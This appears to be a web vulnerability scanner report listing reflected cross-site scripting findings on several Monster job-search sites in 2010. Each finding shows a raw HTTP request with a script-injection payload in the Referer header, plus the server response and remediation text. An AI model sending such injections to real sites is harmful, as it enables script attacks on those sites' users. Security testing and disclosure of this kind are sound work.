GET / HTTP/1.1 Host: job.monster.be Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=81db5'-alert(1)-'428ed200170
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:42:31 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=jkyeloj4zob5jfuju12v1p45; path=/; HttpOnly Set-Cookie: webtrends_Profile=true; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:42:31 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:42:31 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 386796 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d71c'-alert(1)-'1b38a4de911 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: jobb.monster.se Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=2d71c'-alert(1)-'1b38a4de911
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:45:08 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=kekdph55gswnxg45u0ed1w55; path=/; HttpOnly Set-Cookie: webtrends_Profile=true; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:45:08 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:45:08 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 462383 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91ee9'-alert(1)-'a9b6f4997a0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Advertising-PR-Services/get-jobs-13.aspx HTTP/1.1 Host: jobsearch.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65; Referer: http://www.google.com/search?hl=en&q=91ee9'-alert(1)-'a9b6f4997a0
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:48:20 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: JSRTimeStamp=634263797002903663; domain=.monster.ca; path=/ Set-Cookie: NumberOfJSR=2; domain=.monster.ca; path=/ Set-Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=29&where=State%3aAlberta&cy=ca&referrer=search.aspx; domain=.monster.ca; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:20 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:20 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 680750 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34dd1'-alert(1)-'8d56565b039 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Calgary/get-jobs-12.aspx HTTP/1.1 Host: jobsearch.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65; Referer: http://www.google.com/search?hl=en&q=34dd1'-alert(1)-'8d56565b039
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:49:06 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: JSRTimeStamp=634263797467756338; domain=.monster.ca; path=/ Set-Cookie: NumberOfJSR=2; domain=.monster.ca; path=/ Set-Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&where=Calgary%2c+Alberta&cy=ca&referrer=search.aspx; domain=.monster.ca; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:49:06 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:49:06 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 711897 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd18b'-alert(1)-'1b938d3ec5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Computer-Hardware/get-jobs-13.aspx HTTP/1.1 Host: jobsearch.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65; Referer: http://www.google.com/search?hl=en&q=cd18b'-alert(1)-'1b938d3ec5
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:50:00 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: JSRTimeStamp=634263798007017737; domain=.monster.ca; path=/ Set-Cookie: NumberOfJSR=2; domain=.monster.ca; path=/ Set-Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=32&where=State%3aAlberta&cy=ca&referrer=search.aspx; domain=.monster.ca; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:50:00 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:50:00 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 687373 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96dd0'-alert(1)-'2c8186c1c1c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Computer-IT-Services/get-jobs-13.aspx HTTP/1.1 Host: jobsearch.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65; Referer: http://www.google.com/search?hl=en&q=96dd0'-alert(1)-'2c8186c1c1c
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:50:03 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: JSRTimeStamp=634263798033059786; domain=.monster.ca; path=/ Set-Cookie: NumberOfJSR=2; domain=.monster.ca; path=/ Set-Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=77&where=State%3aAlberta&cy=ca&referrer=search.aspx; domain=.monster.ca; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:50:03 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:50:03 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 674897 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45aa5'-alert(1)-'34f36938004 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Edmonton/get-jobs-12.aspx HTTP/1.1 Host: jobsearch.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65; Referer: http://www.google.com/search?hl=en&q=45aa5'-alert(1)-'34f36938004
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:50:04 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: JSRTimeStamp=634263798046817225; domain=.monster.ca; path=/ Set-Cookie: NumberOfJSR=2; domain=.monster.ca; path=/ Set-Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&where=Edmonton%2c+Alberta&cy=ca&referrer=search.aspx; domain=.monster.ca; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:50:04 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:50:04 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 715474 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb063'-alert(1)-'0f03174726d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Management-Consulting-Services/DoNotAddToP4/UserControls/ HTTP/1.1 Host: jobsearch.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65; Referer: http://www.google.com/search?hl=en&q=fb063'-alert(1)-'0f03174726d
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 19:46:58 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:46:58 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:46:58 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 107602 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd60c'-alert(1)-'2538e38dd2b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Management-Consulting-Services/Search.aspx HTTP/1.1 Host: jobsearch.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65; Referer: http://www.google.com/search?hl=en&q=cd60c'-alert(1)-'2538e38dd2b
Response
HTTP/1.1 404 Not Found Connection: close Date: Fri, 26 Nov 2010 19:38:11 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:38:11 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:38:11 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f0ea'-alert(1)-'b7b9ff4c0c4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Management-Consulting-Services/get-jobs-13.aspx HTTP/1.1 Host: jobsearch.monster.ca Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=4f0ea'-alert(1)-'b7b9ff4c0c4
Response
HTTP/1.1 200 OK Cache-Control: no-cache Date: Fri, 26 Nov 2010 19:38:32 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=zzyezc45jrvwzh45h5gm1uzp; path=/; HttpOnly Set-Cookie: split_scsjsv=98; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:38:32 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: JSRTimeStamp=634263791127124008; domain=.monster.ca; path=/ Set-Cookie: NumberOfJSR=1; domain=.monster.ca; path=/ Set-Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=45; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:38:32 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:38:32 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:38:32 GMT; path=/ Vary: Accept-Encoding Content-Length: 687398
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 772a8'-alert(1)-'1f5036ff004 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Staffing-Employment-Agencies/get-jobs-13.aspx HTTP/1.1 Host: jobsearch.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65; Referer: http://www.google.com/search?hl=en&q=772a8'-alert(1)-'1f5036ff004
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:49:50 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: JSRTimeStamp=634263797903022544; domain=.monster.ca; path=/ Set-Cookie: NumberOfJSR=2; domain=.monster.ca; path=/ Set-Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=46&where=State%3aAlberta&cy=ca&referrer=search.aspx; domain=.monster.ca; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:49:50 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:49:50 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 691266 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea06a'-alert(1)-'7a74d60fb22 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Search.aspx HTTP/1.1 Host: jobsearch.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65; Referer: http://www.google.com/search?hl=en&q=ea06a'-alert(1)-'7a74d60fb22
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:50:08 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: JSRTimeStamp=634263798082906125; domain=.monster.ca; path=/ Set-Cookie: NumberOfJSR=2; domain=.monster.ca; path=/ Set-Cookie: BackToJSRLink=&referrer=search.aspx; domain=.monster.ca; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:50:08 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:50:08 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 705487 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d99f'-alert(1)-'b72d8e5a7e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
